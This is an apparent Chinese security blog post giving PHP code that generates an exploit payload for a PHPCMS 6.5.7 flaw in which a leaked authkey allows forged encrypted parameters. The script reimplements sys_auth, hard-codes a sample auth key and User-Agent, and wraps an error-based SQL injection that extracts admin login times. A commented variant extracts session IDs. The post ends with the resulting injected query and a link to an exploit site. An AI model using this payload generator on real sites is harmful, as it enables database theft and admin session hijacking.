PHPCMS某处设计缺陷可致authkey泄露 【针对6.5.7版本的payload生成代码】
<?php
/**
 * String encrypt / decrypt function (copy of the PHPCMS sys_auth() routine).
 *
 * Layout of an ENCODE result, as built below: a 4-char random token, then the
 * base64 (with '=' padding stripped) of [10-digit expiry][16-char md5 tag][data]
 * XORed against a 32-char md5 hex keystream that repeats every 32 bytes.
 *
 * Defensive notes, all visible in the code below: the integrity tag is a
 * truncated unkeyed md5 of data.$egiskeys (not an HMAC) and is compared with
 * '==' rather than hash_equals(); the expiry field is checked with a loose
 * '== 0' comparison whose string-vs-int semantics differ between PHP 7 and 8;
 * an empty $key silently falls back to md5("").
 *
 * @param string $string    string to encode, or a previous ENCODE result to decode
 * @param string $operation ENCODE to encrypt, DECODE to decrypt (optional, default ENCODE)
 * @param string $key       secret key: digits, letters, underscore
 * @param string $expiry    lifetime in seconds added to time() (0 = no expiry)
 * @return string           encoded token, decoded payload, or '' when a DECODE check fails
 */
function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0) {
    // Length of the per-call random prefix token ($runtokey).
    $key_length = 4;
    // echo "auth";
    // echo pc_base::load_config('system', 'auth_key');
    // echo "auth end";
    // Key is normalised to its md5 hex form; an empty key becomes md5("").
    $key = md5($key != '' ? $key : "");
    $fixedkey = md5($key);
    // Tag key: md5 of the second half of $fixedkey; only used for the 16-char integrity tag.
    $egiskeys = md5(substr($fixedkey, 16, 16));
    // ENCODE: last 4 hex chars of md5(microtime) as a fresh token.
    // DECODE: the token is read back from the first 4 chars of the input.
    $runtokey = $key_length ? ($operation == 'ENCODE' ? substr(md5(microtime(true)), -$key_length) : substr($string, 0, $key_length)) : '';
    // 32-char hex keystream. Since $runtokey is at most 4 chars, substr($runtokey, 16) is always ''.
    $keys = md5(substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));
    // ENCODE: prepend a zero-padded 10-digit expiry timestamp (0 when none) and a 16-char
    // md5 tag over plaintext.$egiskeys. DECODE: drop the token and base64-decode the rest.
    $string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$egiskeys), 0, 16) . $string : base64_decode(substr($string, $key_length));
    $i = 0;
    $result = '';
    $string_length = strlen($string);
    // Byte-wise XOR with the keystream, cycling every 32 bytes. The $string{$i} curly-brace
    // offset syntax was removed in PHP 8.0; this copy only parses on PHP 7.x and earlier.
    for ($i = 0; $i < $string_length; $i++){
        $result .= chr(ord($string{$i}) ^ ord($keys{$i % 32}));
    }
    if($operation == 'ENCODE') {
        // Token first so DECODE can recover it, then base64 with '=' padding stripped.
        return $runtokey . str_replace('=', '', base64_encode($result));
    } else {
        // Accept when the expiry is 0 or still in the future AND the 16-char tag matches.
        // Both comparisons use loose '=='; hash_equals() would be the constant-time choice.
        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$egiskeys), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    }
}
#XNvNxVxghgMEoNNq9MiUMozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
// Site-wide auth key and the User-Agent string the derived key is bound to (values as given on the page).
$auth_key = "XNvNxVxghgMEoNNq9MiU";
$ua = "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0";
/**
 * Derives the inner key as md5($auth_key . $ua) from the two globals above.
 * This is the design weakness the page describes: the inner key is a plain
 * hash of the static auth key and a client-supplied User-Agent, so it is
 * reproducible by anyone holding the auth key.
 *
 * @return string 32-char md5 hex
 */
function get_auth_key() {
    global $auth_key;
    global $ua;
    $pc_auth_key = md5($auth_key.$ua);
    return $pc_auth_key;
}
// Called with one argument although the function declares none; PHP ignores the extra argument.
$auth_key2 = get_auth_key("");
// Plaintext that is wrapped by the two sys_auth layers below (an SQL fragment; the resulting
// server query is shown after this listing). NOTE(review): the consuming code interpolates
// this value directly into the query — parameter binding is the fix on the server side.
$sql = "1' and (extractvalue(1,concat(0x7e,(select lastlogintime from v9_admin limit 0,1))));#\txx";
#$sql = "1' and (extractvalue(1,concat(0x7e,(select sessionid from v9_session limit 1,1))));#\tokee";
#echo $auth_key2;
// Inner layer: encode with the derived (auth_key + UA) key.
$sec1 = sys_auth($sql,"ENCODE",$auth_key2);
#echo $sec1;
#echo "\n";
// Outer layer: encode the inner token again with the site auth key itself.
echo sys_auth($sec1,"ENCODE",$auth_key);
//报错代码:
SELECT * FROM `tianyu`.`v9_member` WHERE `userid` = '1' and (extractvalue(1,concat(0x7e,(select user()))));#' LIMIT 1
参考:http://0day5.com/archives/3251/
天道酬勤